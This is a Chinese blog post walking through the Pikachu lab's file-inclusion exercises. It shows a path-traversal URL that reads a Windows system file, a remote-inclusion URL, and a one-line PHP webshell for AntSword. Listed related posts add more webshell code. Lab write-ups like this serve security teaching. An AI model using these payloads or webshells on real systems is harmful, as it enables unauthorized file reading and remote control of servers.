PiKachu-File Inclusion(文件包含漏洞)

最新推荐文章于 2024-09-11 18:11:29 发布
最新推荐文章于 2024-09-11 18:11:29 发布
阅读量920 收藏 5
点赞数 3
分类专栏: Pikachu 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/124234455
版权
本文详细介绍了文件包含漏洞的概念,特别是本地文件包含和远程文件包含两种类型。通过实例展示了如何利用这些漏洞读取隐藏文件和系统文件,以及如何进行远程文件包含。同时提到了一句话木马的连接,强调了在开发中避免用户直接控制文件包含变量并实施严格的安全策略的重要性。
摘要由CSDN通过智能技术生成

概述

File Inclusion(文件包含漏洞)概述
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:
include(),include_once()
require(),require_once()
这些文件包含函数,这些函数在代码设计中被经常使用到。
大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同的配置环境,文件包含漏洞分为如下两种情况:
1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。
因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。
你可以通过“File Inclusion”对应的测试栏目,来进一步的了解该漏洞。

本地文件包含

读取隐藏文件

打开网址看见可以选择NBA的球星

http://192.168.66.1/pikachu-master/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

 我们发现url中存在fileinclude/fi_local.php?filename=file1.php

那我们就可以爆破一下存在数字的地方

 

 

我们发现,出来一到五只有六的长度是唯一的,那么我们就修改一下url。

192.168.66.1/pikachu-master/vul/fileinclude/fi_local.php?filename=file6.php&submit=提交查询

我们就发现了隐藏的文件了

其他的数字均是报错

 

 读取系统文件

毕竟我们这个是在小皮面板下面建立的靶场,那么在我们建立的靶场中一定存在Windows\win.ini那我们就根据报错的地址猜测这个win.ini在哪里,这就需要用到相对路径了,因为我们大概率猜不出绝对路径../../../../../../windows/win.ini,这个相对路径前面的../可以看一下fi_local.php前面有几个斜杠D:\phpstudy_pro\WWW\pikachu-master\vul\fileinclude\fi_local.php。那就更改一下url

http://192.168.66.1/pikachu-master/vul/fileinclude/fi_local.php?filename=../../../../../../windows/win.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

为什么要这么修改呢,是因为在之前的报错显示中使用的方法是include直接搞到了地址

include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。

包含文件很有用,如果您需要在网站的多张页面上引用相同的 PHP、HTML 或文本的话。

远程文件包含 

先观察一下url,直接把include显示出来了

http://192.168.66.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

远程包含http试试,修改一下url

http://192.168.66.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=https://www.csdn.net/&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

 

 一句话木马连接 

这个连接在实际应用中没事用,但是可以练习一下蚁剑的连接。搞个一句木马

<?php assert($_POST[fin]);?>

改名为shell.php

 然后蚁剑连一下

连接成功,就可以随便修改,本机的内容了

仲瑿
关注
专栏目录
pikachu通关教程(File include)
Bu2n的博客
12-11 546
文件包含本地文件包含远程文件包含 本地文件包含 随便选一个选项,可以看到url提交的参数存在文件名 随便输入值,还会爆出当前路径 源码 $html=''; if(isset($_GET['submit']) && $_GET['filename']!=null){ $filename=$_GET['filename']; include "include/$filename";//变量传进来直接包含,没做任何的安全限制 // //安全的写法,使用白名单,严格指定包
文件上传漏洞——渗透day11
qq_62716256的博客
09-09 708
文件上传漏洞——渗透day11
Pikachu-File Inclusion
baynk的博客
11-19 819
0x00 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函...
【网络安全】-文件包含漏洞-pikachu
最新发布
weixin_65311462的博客
09-11 1875
文件包含漏洞是指程序在执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行使用,从而导致hacker可以利用这个漏洞包含恶意文件,执行任意代码进而访问敏感信息。1.本地文件包含漏洞与远程文件包含漏洞在防范措施上,两者都需要对用户输入进行严格的验证和过滤,但远程文件包含漏洞还需要特别注意禁用相关配置选项和限制外部资源的访问权限。
pikachu文件包含漏洞
weixin_51446936的博客
06-09 2228
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
pikachu漏洞练习平台之文件包含
m0_55854679的博客
06-23 439
File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once(), require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量
pikachu-文件包含
baidu_39504221的博客
11-21 259
文章目录0x01 本地文件包含0x02 远程文件包含 0x01 本地文件包含 在根目录D:\phpstudy_pro\WWW\pikachu\vul\sqli下创建一个1.txt,再尝试包含一下 0x02 远程文件包含 将自己服务器上的文件下载到被害人的服务器上就是远程文件包含 1)在自己的服务器上写一个攻击脚本1.txt <?php $myfile = fopen("1.php", "w"); $txt = '<?php @eval($_POST["test"]);?&g
Pikachu漏洞练习平台
blalaa的博客
09-04 3409
一、暴力破解 【基于表单的暴力破解】 ①在登录框随意输入账号密码,开启burp suite抓包。 ②将抓到的包,右键点击发送到intruder模块 ③打开intruder,点击positions,选择需要替换的变量,先“clear”后“add”,选择适合的攻击模式: 1)Sniper:狙击手,默认每次只能有一个变量进行攻击。 2)Battering ram:冲撞车。可选多个变量同时替换,但都只用同一个字典。 3)Ptichfork:草叉型,可选多个变量,每个变量一个字典,然后一一对应实验。 4)Clus
远程文件包含漏洞
Ethan024的博客
04-08 787
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
pikachu文件包含
qq_42728977的博客
12-24 3580
参考链接https://www.cnblogs.com/p201721210007/p/12034896.html 文件包含漏洞(File Inclusion)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),r...
文件包含原理及本地文件包涵漏洞案例演示;远程文件包含漏洞案例讲解和演示;文件包含漏洞之文件上传漏洞的利用
qq_44696653的博客
05-12 1259
文件包含原理及本地文件包涵漏洞案例演示 一、文件包含漏洞概述(摘录) 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简介,会使用“包含”函数功能。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用函数代码。 但有些时候,因为网站功能需求,会让前端用户选择...
PIKACHU文件包含
qq_62078839的博客
04-11 1433
原理 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 PHP中文件包含函数有以下四种: require() require_once() include() include_once() 本地文件包含 我们再pikachu
pikachu笔记之文件包含
weixin_53255260的博客
07-29 1331
一、概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用“包含”函数功能。比如把一系列功能函数写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?oho include fuction.php?>就可以调用函数代码。 但有些时候,因为网站的功能需求,会让前端用户选择需要包含的文件或者在前端的功能中使用了“包含”功能。又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置...
Pikachu系列——文件包含
Zlirving_的博客
05-18 856
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验六 —— 文件包含 文件包含概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include( ) 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含 进来,发生错误时之给出一个警告,继续向下执行。 include_once( ) 功能与 Include()相同,区别在于当重
Pikachu靶场--文件包含
qq_65150735的博客
06-18 1236
Pikachu靶场--文件包含
pikachu--- file include
weixin_50339832的博客
06-16 302
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有...
pikachuFile Inclusion
Alsn86的博客
12-10 1776
pikachuFile Inclusion 准备好一段创建一句话木马的php代码,后缀改为jpg <?php $mima="'".'ma'."'"; touch ("testshell.php"); $file = fopen("testshell.php","w"); $write='<?php @eval($_POST['.$mima.']); ?>'; echo fwrite($file,$write); fclose($file); echo "已经创建一句话php文件";
pikachu-master
08-16
pikachu-master是一个带有漏洞的Web应用系统,可以用于进行web安全漏洞的练习和学习。你可以从GitHub上下载pikachu-master的源码,并将其上传到你的Web服务器的根目录下。然后,你可以通过访问服务器的IP地址加上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值